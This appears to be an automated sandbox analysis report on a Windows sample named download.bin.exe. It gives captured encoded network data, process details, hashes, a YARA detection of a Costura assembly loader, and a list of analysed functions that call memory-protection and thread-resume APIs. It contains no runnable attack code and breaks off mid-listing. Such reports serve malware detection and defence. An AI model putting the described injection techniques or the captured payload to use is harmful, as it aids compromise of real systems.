LieHQf6xgnLKqzcJ3y/5DVNtIxQRc4OKoRJhZrynmi8g9d9fvLOXPUSroEPJqabGXii1GglkTMcsjCLrNKvbZe3+3kZ5vFS5DO7oRB3uOptR/baaBL1bzWtab+Pz/x+o7KINwyf9mDOKaLUI1y85StZtqRqM+oTCY9knKDvk3atrP8AbODSa/honZQTL6a3MRmqj3Qb9G4+rnuQhsScVpGJ3zslgKtj8D2jrBFyju0oZoa6YkPMDmGTTab/yqp2
2025-01-03 22:03:10 UTC	1369	IN	Data Raw: 45 54 7a 66 5a 58 2b 67 36 69 33 43 5a 5a 37 36 51 67 5a 49 62 56 66 53 43 56 47 6d 71 4f 63 4a 36 4d 6d 70 6b 34 72 39 37 49 48 44 6a 47 7a 51 76 6d 4b 35 72 51 41 69 4b 37 36 6d 6c 53 70 6f 5a 66 4c 64 4a 6e 41 4d 68 44 75 66 72 42 6a 31 57 31 70 66 52 69 4f 64 7a 4d 58 2b 68 74 75 71 59 38 59 72 69 66 48 30 4f 2f 68 46 59 6a 30 68 4e 34 6e 55 71 73 2b 74 71 36 53 35 79 49 30 32 41 77 6d 75 4e 41 37 57 4b 74 71 6d 45 75 76 34 77 79 63 61 71 31 55 6a 37 73 4a 68 65 2f 62 5a 69 6b 34 70 4a 67 67 39 7a 71 4c 6a 6e 33 72 32 72 77 59 34 65 72 4e 46 75 65 6b 68 78 6b 71 34 31 4d 4a 63 77 56 61 71 49 74 76 62 37 78 69 46 57 68 68 4d 6f 75 47 4f 6e 6a 61 66 4d 75 6b 62 4d 77 63 4a 6d 53 45 6e 65 46 73 32 6c 48 78 47 39 67 79 56 57 4a 70 74 76 36 54 70 4f 49 78 Data Ascii: ETzfZX+g6i3CZZ76QgZIbVfSCVGmqOcJ6Mmpk4r97IHDjGzQvmK5rQAiK76mlSpoZfLdJnAMhDufrBj1W1pfRiOdzMX+htuqY8YrifH0O/hFYj0hN4nUqs+tq6S5yI02AwmuNA7WKtqmEuv4wycaq1Uj7sJhe/bZik4pJgg9zqLjn3r2rwY4erNFuekhxkq41MJcwVaqItvb7xiFWhhMouGOnjafMukbMwcJmSEneFs2lHxG9gyVWJptv6TpOIx
2025-01-03 22:03:10 UTC	1369	IN	Data Raw: 34 61 66 67 32 76 4e 30 57 4a 36 53 4e 43 77 75 2b 72 6a 55 37 6c 68 6b 62 6d 46 54 54 72 4f 4c 38 4e 35 4b 62 7a 69 4d 39 7a 4f 70 4e 6a 67 71 76 74 47 4e 65 35 72 41 49 57 49 36 31 64 69 58 55 47 6a 53 48 5a 39 7a 36 67 49 4a 42 6f 70 2b 58 47 44 4f 62 36 58 61 49 4d 71 53 6b 59 6e 54 76 37 68 6c 56 39 36 46 47 4c 2b 51 4e 4f 59 64 70 33 59 66 64 34 44 69 70 71 75 6b 41 45 39 75 78 44 4e 67 61 6f 34 59 75 66 4c 37 72 49 47 79 50 6d 48 4a 65 31 54 4d 36 78 6e 65 36 71 74 69 2f 4a 50 4f 41 6c 6d 63 6c 77 62 6c 4a 68 32 79 79 6f 68 78 36 69 76 49 37 62 65 79 56 57 31 71 52 61 47 58 50 59 37 2b 35 32 4b 35 62 6c 61 69 55 47 48 37 6b 77 6e 61 4e 49 72 4b 4f 49 31 36 2b 72 52 52 36 73 49 46 67 41 4d 77 4a 43 71 6c 6b 75 72 33 38 69 55 32 75 33 4e 64 6e 5a 70 Data Ascii: 4afg2vN0WJ6SNCwu+rjU7lhkbmFTTrOL8N5KbziM9zOpNjgqvtGNe5rAIWI61diXUGjSHZ9z6gIJBop+XGDOb6XaIMqSkYnTv7hlV96FGL+QNOYdp3Yfd4DipqukAE9uxDNgao4YufL7rIGyPmHJe1TM6xne6qti/JPOAlmclwblJh2yyohx6ivI7beyVW1qRaGXPY7+52K5blaiUGH7kwnaNIrKOI16+rRR6sIFgAMwJCqlkur38iU2u3NdnZp
2025-01-03 22:03:10 UTC	1192	IN	Data Raw: 50 36 37 54 59 45 54 69 6e 7a 4e 51 70 73 6b 30 46 75 63 4e 4b 35 39 68 73 34 43 5a 6a 6c 69 51 74 50 63 50 46 39 37 6b 59 4a 55 30 6e 61 35 6e 59 36 44 72 45 57 32 6c 30 54 59 5a 79 54 63 6e 6f 69 32 74 6e 4a 2b 44 50 36 6d 2b 31 54 51 64 2f 75 4e 56 33 54 79 37 6b 6a 4d 75 76 4a 55 36 51 2f 61 47 55 67 58 48 4d 43 61 34 57 4a 4b 46 79 4c 4e 2f 73 61 66 70 59 42 7a 4f 34 55 50 61 4f 62 75 38 66 47 4b 6c 75 51 70 47 39 37 46 46 4f 65 67 77 4b 72 4e 6d 6e 6f 54 41 75 58 6a 30 70 2b 42 67 5a 2b 66 6a 53 4d 38 38 6a 6f 67 65 4a 75 43 51 4d 78 6d 39 32 6c 51 4e 77 42 6f 41 68 6d 43 73 6d 4f 72 2f 51 71 71 4e 78 43 4a 6c 6e 74 68 54 31 78 6d 77 73 78 5a 5a 75 70 51 77 53 71 6d 54 4c 45 48 37 4c 42 57 34 59 5a 4c 2b 38 62 74 44 6e 61 50 6b 4a 53 4c 44 36 32 33 Data Ascii: P67TYETinzNQpsk0FucNK59hs4CZjliQtPcPF97kYJU0na5nY6DrEW2l0TYZyTcnoi2tnJ+DP6m+1TQd/uNV3Ty7kjMuvJU6Q/aGUgXHMCa4WJKFyLN/safpYBzO4UPaObu8fGKluQpG97FFOegwKrNmnoTAuXj0p+BgZ+fjSM88jogeJuCQMxm92lQNwBoAhmCsmOr/QqqNxCJlnthT1xmwsxZZupQwSqmTLEH7LBW4YZL+8btDnaPkJSLD623
2025-01-03 22:03:10 UTC	1369	IN	Data Raw: 31 62 61 61 0d 0a 7a 57 43 39 67 54 75 71 63 50 65 4f 2b 58 44 32 47 72 6a 7a 41 51 2b 54 77 6d 79 7a 75 6f 69 39 72 7a 58 49 47 33 77 68 6b 51 34 73 31 67 7a 7a 69 4b 6e 52 30 6e 76 34 34 30 64 61 2b 54 56 43 62 52 42 47 75 7a 4d 59 4f 76 34 70 63 67 67 35 66 76 50 69 62 47 31 77 72 56 48 4b 6d 48 49 32 4f 47 39 68 5a 6e 71 4b 64 56 44 5a 59 35 4e 35 68 4a 6f 34 76 50 6b 33 61 2b 71 59 77 73 49 2b 53 72 54 50 63 4a 69 70 64 76 54 4b 53 4f 44 52 6d 39 70 44 56 65 6b 42 30 55 71 6b 61 6c 72 4d 79 5a 52 34 79 44 35 57 64 74 78 4f 64 73 6a 7a 32 6b 71 44 55 68 6d 61 35 75 51 66 2b 4b 51 51 44 56 4a 6a 36 4b 53 4c 37 2b 35 70 4e 74 38 34 33 75 44 41 6d 45 36 6d 6a 50 47 61 32 47 4d 6b 2b 65 68 53 46 4a 68 62 70 52 54 64 41 6d 4a 5a 5a 48 6b 4c 2f 5a 73 6b 71 Data Ascii: 1baazWC9gTuqcPeO+XD2GrjzAQ+Twmyzuoi9rzXIG3whkQ4s1gzziKnR0nv440da+TVCbRBGuzMYOv4pcgg5fvPibG1wrVHKmHI2OG9hZnqKdVDZY5N5hJo4vPk3a+qYwsI+SrTPcJipdvTKSODRm9pDVekB0UqkalrMyZR4yD5WdtxOdsjz2kqDUhma5uQf+KQQDVJj6KSL7+5pNt843uDAmE6mjPGa2GMk+ehSFJhbpRTdAmJZZHkL/Zskq
2025-01-03 22:03:10 UTC	1369	IN	Data Raw: 7a 33 34 78 48 32 49 4f 5a 72 55 5a 6c 65 6d 39 6a 6c 30 69 4a 46 7a 46 39 49 64 49 4d 6c 62 68 70 33 34 2b 7a 2b 70 74 50 38 79 59 74 37 47 63 39 52 6a 6d 35 77 6e 62 71 36 4e 4b 55 4f 33 72 57 51 58 32 7a 78 69 69 45 47 6c 2b 38 65 74 53 36 7a 63 77 53 38 32 6e 62 6b 4f 39 79 69 79 70 67 31 7a 6c 37 63 2b 45 76 57 74 56 43 58 43 61 68 48 48 63 74 32 67 6e 61 55 2b 73 6f 2f 44 59 53 4c 4b 31 31 48 52 46 37 2b 76 4c 58 53 69 37 7a 70 6b 67 5a 4d 2b 50 65 55 4a 49 39 56 33 73 71 58 2b 68 47 71 64 69 4a 38 47 46 39 6a 36 64 59 6f 50 70 49 45 6e 4c 34 53 2b 4b 48 6a 30 74 30 38 59 35 6a 6f 48 6c 57 75 63 71 4a 6d 4b 4f 37 4b 30 31 54 73 63 6d 74 5a 4e 35 6d 4f 37 31 52 49 6e 75 35 73 52 5a 59 69 49 5a 43 32 54 45 77 75 58 61 36 6a 39 34 34 56 4b 68 36 66 49 Data Ascii: z34xH2IOZrUZlem9jl0iJFzF9IdIMlbhp34+z+ptP8yYt7Gc9Rjm5wnbq6NKUO3rWQX2zxiiEGl+8etS6zcwS82nbkO9yiypg1zl7c+EvWtVCXCahHHct2gnaU+so/DYSLK11HRF7+vLXSi7zpkgZM+PeUJI9V3sqX+hGqdiJ8GF9j6dYoPpIEnL4S+KHj0t08Y5joHlWucqJmKO7K01TscmtZN5mO71RInu5sRZYiIZC2TEwuXa6j944VKh6fI
2025-01-03 22:03:10 UTC	1369	IN	Data Raw: 70 59 38 67 4c 44 6b 42 70 6d 6c 49 63 76 63 34 53 6b 5a 68 37 4a 61 79 62 50 4f 35 75 71 2f 4a 31 70 6f 74 37 79 5a 54 47 63 38 56 33 47 4f 72 4c 4f 49 58 66 6a 72 78 35 4d 74 49 4e 74 51 4a 63 6e 5a 72 68 73 70 49 54 68 2f 6e 36 4d 69 4d 6b 42 44 5a 75 79 65 50 46 71 30 4c 59 46 51 35 7a 75 62 6d 75 45 6c 33 63 5a 69 47 64 6e 75 58 61 2b 6d 70 69 4d 58 35 6a 42 33 52 6f 7a 2f 4f 4e 2f 32 54 79 46 69 68 34 39 73 2b 77 2b 5a 36 69 6e 54 43 33 55 5a 78 57 71 4d 59 79 70 78 49 46 59 71 59 6a 46 5a 51 62 4b 73 57 6a 63 46 39 7a 4f 4e 46 75 6d 73 51 4a 55 72 71 5a 2f 46 4d 73 6f 5a 6f 64 55 30 2b 62 4d 6e 54 36 69 72 4d 77 41 4f 38 2b 72 51 39 6b 70 6d 62 38 7a 59 4c 57 78 4b 6e 69 72 6b 57 34 66 6c 78 73 71 7a 6d 36 48 39 4f 4b 48 4f 72 57 39 39 7a 67 44 38 Data Ascii: pY8gLDkBpmlIcvc4SkZh7JaybPO5uq/J1pot7yZTGc8V3GOrLOIXfjrx5MtINtQJcnZrhspITh/n6MiMkBDZuyePFq0LYFQ5zubmuEl3cZiGdnuXa+mpiMX5jB3Roz/ON/2TyFih49s+w+Z6inTC3UZxWqMYypxIFYqYjFZQbKsWjcF9zONFumsQJUrqZ/FMsoZodU0+bMnT6irMwAO8+rQ9kpmb8zYLWxKnirkW4flxsqzm6H9OKHOrW99zgD8

Target ID:	0
Start time:	17:02:57
Start date:	03/01/2025
Path:	C:\Users\user\Desktop\download.bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\download.bin.exe"
Imagebase:	0xd80000
File size:	1'139'712 bytes
MD5 hash:	47BD83617560C80C7E805B546EA2A258
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1704566054.00000000059C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1689222896.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:02:58
Start date:	03/01/2025
Path:	C:\Users\user\Desktop\download.bin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\download.bin.exe"
Imagebase:	0x550000
File size:	1'139'712 bytes
MD5 hash:	47BD83617560C80C7E805B546EA2A258
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.9%
Total number of Nodes:	185
Total number of Limit Nodes:	4

Executed Functions

Function 05C04480 Relevance: 16.1, Strings: 12, Instructions: 1146COMMON

Download Yara Rule

Strings

$^q, xrefs: 05C04987
,bq, xrefs: 05C04F4A
$^q, xrefs: 05C04713
$^q, xrefs: 05C048E7
$^q, xrefs: 05C04997
$^q, xrefs: 05C04D61
$^q, xrefs: 05C048D7
$^q, xrefs: 05C04DBA
$^q, xrefs: 05C04723
$^q, xrefs: 05C04DCA
$^q, xrefs: 05C04D71
4, xrefs: 05C04E65

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-312445597
Opcode ID: 60133cdaf286e909c9a8731c576cadc376e97ceedce9ca1a930e31a74644fa5b
Instruction ID: 3561c76422ecbe6c7cbe77ca2d88e00a0a034164debc0966cca0e94e15816019
Opcode Fuzzy Hash: 60133cdaf286e909c9a8731c576cadc376e97ceedce9ca1a930e31a74644fa5b
Instruction Fuzzy Hash: 25B20A34A002189FDB18CFA9C994BAEB7B6FF88700F155599E505AB3A4CB70ED85CF50

Function 05C047B7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$^q, xrefs: 05C04987
,bq, xrefs: 05C04F4A
$^q, xrefs: 05C04D61
$^q, xrefs: 05C048D7
$^q, xrefs: 05C04DBA
4, xrefs: 05C04E65

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q
API String ID: 0-2546334966
Opcode ID: dc672a2b346c9f084adf5c0143f43acc799bbaaba0f735f9c2d57e638f1b2232
Instruction ID: d36eebde263f4bddcc9cb0ba4f688de5752f236650bb3ffb36e52495d85aa9bd
Opcode Fuzzy Hash: dc672a2b346c9f084adf5c0143f43acc799bbaaba0f735f9c2d57e638f1b2232
Instruction Fuzzy Hash: 10220B34A00218CFDB28DFA5C994BADB7B6FF48700F1495A9E509AB3A5DB709D81CF50

Function 05834B88 Relevance: 7.2, Strings: 5, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pbq, xrefs: 05835742
u*p, xrefs: 05834F5B
xbaq, xrefs: 05834CB5
Te^q, xrefs: 058352AB
TJcq, xrefs: 05834D2A

Memory Dump Source

Source File: 00000000.00000002.1704032898.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_download.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$pbq$u*p$xbaq
API String ID: 0-1860657974
Opcode ID: 5d146956ae8770e46b2098624abda73754df5f509503bd27525900547eab2bc3
Instruction ID: 3da5153c2a5851cfa3bb33ac39374624ef1ef08d87aba99519a59a124a8d86d7
Opcode Fuzzy Hash: 5d146956ae8770e46b2098624abda73754df5f509503bd27525900547eab2bc3
Instruction Fuzzy Hash: 70A2B575A00228DFDB64CF69C984A9DBBB2FF89314F1581E9D509AB325DB319E81CF40

Function 05837128 Relevance: 3.8, Strings: 2, Instructions: 1343
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 05838116
$^q, xrefs: 0583779A

Memory Dump Source

Source File: 00000000.00000002.1704032898.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_download.jbxd

Similarity

API ID:
String ID: 2$$^q
API String ID: 0-1071376767
Opcode ID: bad7b735ae0f97778a2398509d4ff8a6a8368ff58f322871d3209c82d3983843
Instruction ID: 1015771b70465ec386eccfdfed654cf34c34a83658a9990bee5e9a8d64cc38fd
Opcode Fuzzy Hash: bad7b735ae0f97778a2398509d4ff8a6a8368ff58f322871d3209c82d3983843
Instruction Fuzzy Hash: D0E295B4A016298FCB65DF69D88469EBBF1FB89301F1081EAD809A7364DB345EC5CF50

Function 05D6C640 Relevance: 3.1, Strings: 2, Instructions: 617
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 05D6C76D
8, xrefs: 05D6C75A

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: fcq$8
API String ID: 0-89531850
Opcode ID: c7aa790e8d7458e110adff91ab75816fd52aa43ec0386f292288a0ff7964e0be
Instruction ID: cf25dddbdcebacb221a2204fdb3fdbd405cd67b7f788d7c8030b90e8e805d91f
Opcode Fuzzy Hash: c7aa790e8d7458e110adff91ab75816fd52aa43ec0386f292288a0ff7964e0be
Instruction Fuzzy Hash: 9652D975E00629CFDB64DF69CC94AD9BBB1FB89310F10859AD819A7354DB30AE81CF90

Function 05C0012A Relevance: 2.9, Strings: 2, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ju{, xrefs: 05C00307
Te^q, xrefs: 05C003C7

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: Ju{$Te^q
API String ID: 0-2702852421
Opcode ID: ca24d5030f0d7c8752c60719d1168bf2a8582d2c443e97c89a445db60aadbd2c
Instruction ID: eb62480b577097d76311b3fbb3914082d8a6401a381c3aaac549217ac78d0844
Opcode Fuzzy Hash: ca24d5030f0d7c8752c60719d1168bf2a8582d2c443e97c89a445db60aadbd2c
Instruction Fuzzy Hash: EDF11574A05219CFDB64CF9AC848BAEBBF2FB49300F5194AAD409A7394CB745E85CF50

Function 05D6C63B Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

fcq, xrefs: 05D6C76D
h, xrefs: 05D6C74E

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: fcq$h
API String ID: 0-1849521214
Opcode ID: d229781cce5fd890ff45aec529dc9b09babe863c8d3a8b6278ac12303e8c3459
Instruction ID: 2e5cfbb6e591b5e1f63adf69b99921e22f254192b3e2efee79ba6ce342b50d41
Opcode Fuzzy Hash: d229781cce5fd890ff45aec529dc9b09babe863c8d3a8b6278ac12303e8c3459
Instruction Fuzzy Hash: C571F975E01629CBDB64DF6ACC40BD9BBB2FF89300F5081AAD819A7254DB305E85CF91

Function 0583FA78 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0583FB2D

Memory Dump Source

Source File: 00000000.00000002.1704032898.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_download.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: e45cb24bc534b70a1e2427cd0246c0c269e4aa2db765c3e7263b0b9f23dc2657
Instruction ID: 4e3495640cd137c7e54d0a8a5b71fbb14ff9b530cd42a77a0d904e53ce7a1f6e
Opcode Fuzzy Hash: e45cb24bc534b70a1e2427cd0246c0c269e4aa2db765c3e7263b0b9f23dc2657
Instruction Fuzzy Hash: E74199B4D042589FCF10CFAAD981ADEFBB1BF49310F10902AE915B7210D735A945CF98

Function 05D2211B Relevance: 1.6, APIs: 1, Instructions: 83nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 05D221AE

Memory Dump Source

Source File: 00000000.00000002.1705620521.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d20000_download.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8830cbc52a1cb92d16873c8fe8a59cd46ab4c2a2a2bc731b76afb72b97c5fbcb
Instruction ID: 5d88f3592037cd5ac2eecf6ddeb7049f72b19b948f3c003fe944cebad233409d
Opcode Fuzzy Hash: 8830cbc52a1cb92d16873c8fe8a59cd46ab4c2a2a2bc731b76afb72b97c5fbcb
Instruction Fuzzy Hash: 0031B9B9D012189FCB10CFAAD984A9EFBF1BB49314F20942AE815B7300C735A945CF94

Function 05D22120 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 05D221AE

Memory Dump Source

Source File: 00000000.00000002.1705620521.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d20000_download.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9da38f26f9169302d70f5a3d4f0379e41b637eb451392ad975d392f8e0978dce
Instruction ID: a48a8760ed0c996e598933daa79261d79dce29d8e25c5a2ff8a30ee9fabf0fd4
Opcode Fuzzy Hash: 9da38f26f9169302d70f5a3d4f0379e41b637eb451392ad975d392f8e0978dce
Instruction Fuzzy Hash: 0B31A8B8D012189FCB10CFAAD984ADEFBF5BB49310F20942AE915B7300C775A945CFA4

Function 05D69580 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

PH^q, xrefs: 05D698E9

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: ce0863348cfcceab65f148ef871e1c74edb65d9f83a4903090b000129ae02318
Instruction ID: 6fecbd3dfe9fc310a936dd9dab8b0a89aced662a0aa102b9388d3a2b22d6a5a3
Opcode Fuzzy Hash: ce0863348cfcceab65f148ef871e1c74edb65d9f83a4903090b000129ae02318
Instruction Fuzzy Hash: 29D1F474E05218CFDB14CFAAC894BADBBF2FB49304F1090AAD459A7254DB749D8ACF41

Function 05A57870 Relevance: 1.5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05A5799A

Memory Dump Source

Source File: 00000000.00000002.1704794390.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a50000_download.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 019f53508e3a3d1e022c5fab782b423ab453912bc30cab783dfc53d8c9295a01
Instruction ID: d32ef0f94afae52abaaa28b8ea5a69611cfa2ca5870ba2ff25276a36aaae19e3
Opcode Fuzzy Hash: 019f53508e3a3d1e022c5fab782b423ab453912bc30cab783dfc53d8c9295a01
Instruction Fuzzy Hash: 12B1C1B0E05218CFDB54CFAAD884FADBBF6FB49354F1090A9E819A7251DB746985CF00

Function 05A57860 Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

Te^q, xrefs: 05A5799A

Memory Dump Source

Source File: 00000000.00000002.1704794390.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a50000_download.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 60eae40b38ebea36f2208d88bc47903c5c74266d99e569cf130b55de4046f296
Instruction ID: c0887010702f764a5c2d577b6698847cc7b34daf5802b2c69f33ca1ef27a5aca
Opcode Fuzzy Hash: 60eae40b38ebea36f2208d88bc47903c5c74266d99e569cf130b55de4046f296
Instruction Fuzzy Hash: E7B1C1B0E05218CFDB54CFAAD884FADBBF2FB49354F1091A9E819A7251DB746985CF00

Function 05838A9B Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704032898.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abafc45592a2d2f56fa776bcd59fbb8ad6341cc6d0a54b3688c13ef0845b68a8
Instruction ID: 01cbf08876cccbd655e5dbc10f25bec340aa892085f53bd4f06418a58fd6827c
Opcode Fuzzy Hash: abafc45592a2d2f56fa776bcd59fbb8ad6341cc6d0a54b3688c13ef0845b68a8
Instruction Fuzzy Hash: 9F52B4B4A04629CFCB64DF29C984B9ABBB6FB49301F1081D9D90DA7355DB30AE85CF50

Function 05A572F7 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704794390.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a50000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffc3b5a98479e83317bebc3ea87c4999da8808776aa16cb7dcc2e7df3b9d9cb9
Instruction ID: dcdc70e695075c3016a4f41ccea6888bc4c33074fa0926f4a80963de41aa34ad
Opcode Fuzzy Hash: ffc3b5a98479e83317bebc3ea87c4999da8808776aa16cb7dcc2e7df3b9d9cb9
Instruction Fuzzy Hash: 55D10EB0E05218DFDB14CFA9D884FADBBB2FB49364F5080A9D819B7250DB749A85CF11

Function 05D63BF7 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1939e03e2c534d87737fe58a690c78fc4fa91c8444b8dab47583f9cb20d12f1
Instruction ID: d5f1827b94d7eeee83581624c7b0b58fc70f6edb80cdadea965235ea2c873ea7
Opcode Fuzzy Hash: b1939e03e2c534d87737fe58a690c78fc4fa91c8444b8dab47583f9cb20d12f1
Instruction Fuzzy Hash: BFD10574E05218CFDB54DFA9D894BADBBB2FB89300F2090AAD419A7351DB349D86CF50

Function 05C39B70 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705145119.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c30000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92ee1af11d992226c45ec51b4bd016bec2779b64d8547f1b383bc1e7e3f9de8a
Instruction ID: 1fc7c74cd8f7bf5c40a8473b14291128f05ee7bb4ecc32e1f46f328c0b96868e
Opcode Fuzzy Hash: 92ee1af11d992226c45ec51b4bd016bec2779b64d8547f1b383bc1e7e3f9de8a
Instruction Fuzzy Hash: 81C12674A0521CCFDB64DFA6D845BADBBF2FB49300F2084AAD409AB294CB745E85CF51

Function 05D63C18 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f12d7eeb290ff7ea8be8739f92859058111e80b6e43e72de09c0ce52f2c891df
Instruction ID: 1c1e7381c287baf1bed5306c8529875bee1c16c890e26a3ac53e9d25888d7b59
Opcode Fuzzy Hash: f12d7eeb290ff7ea8be8739f92859058111e80b6e43e72de09c0ce52f2c891df
Instruction Fuzzy Hash: 55C10570E05218CFDB54DFA9D884BADBBB2FB49300F2094AAD419A7351DB349D86CF50

Function 05D640A1 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d4dfcb7a5e5340bd77598bf6809afd418c1423ec2d3c1edffd1ef3185291741
Instruction ID: 1d95c5557d9c6c23fd408dbe045eec2af452a8f53400803284cf55f9342556b7
Opcode Fuzzy Hash: 0d4dfcb7a5e5340bd77598bf6809afd418c1423ec2d3c1edffd1ef3185291741
Instruction Fuzzy Hash: BFC1E374E05218CFDB54DFA9D884BADBBB2FB49300F2090AAD419A7355DB349D86CF50

Function 05D6B8D1 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

